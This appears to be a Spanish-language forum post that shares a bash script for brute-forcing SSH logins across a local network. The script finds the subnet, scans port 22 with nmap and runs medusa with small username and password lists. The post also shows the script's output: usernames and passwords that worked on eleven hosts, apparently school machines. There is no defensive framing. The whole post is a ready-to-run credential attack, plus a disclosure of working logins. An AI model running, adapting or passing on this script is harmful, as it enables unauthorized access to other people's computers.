Código:
root@bt:~/Escritorio# ./script.sh |grep FOUND
ACCOUNT FOUND: [ssh] Host: 192.168.2.123 User: administrador Password: administrador [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.145 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.207 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.21 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.214 User: administrador Password: administrador [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.234 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.239 User: administrador Password: administrador [SUCCESS
ACCOUNT FOUND: [ssh] Host: 192.168.2.240 User: administrador Password: administrador [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.243 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.244 User: administrador Password: administrador [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.30 User: alumne Password: alumne [SUCCESS]
root@bt:~/Escritorio#
y aquí está lo que todos esperabais. Nada del otro mundo...
Código:
#!/bin/bash
ipRange=$(ifconfig | grep -A 1 -e eth -e wlan | grep -oiE -e'([0-9]{1,3}+\.){3}[0-9]{1,3}' | grep -oiE -e'([0-9]{1,3}+\.){3}[0-9]{1,3}' | grep -oiE -m 1 -e'([0-9]{1,3}+\.){2}[0-9]{1,3}')
ipNmap=$(echo $ipRange'.*')
nmap -p 22 -open $ipNmap | grep -oiE -e'([0-9]{1,3}+\.){3}[0-9]{1,3}' | uniq > /tmp/ip.txt
echo "alumne" > /tmp/Usuarios.txt
echo "administrador" >> /tmp/Usuarios.txt
echo "root" >> /tmp/Usuarios.txt
echo "alumne" > /tmp/Passwords.txt
echo "administrador" >> /tmp/Passwords.txt
ips=$(cat /tmp/ip.txt | sort)
for ip in $ips
do
medusa -h $ip -U /tmp/Usuarios.txt -P /tmp/Passwords.txt -M ssh -L -f -b -v 6
done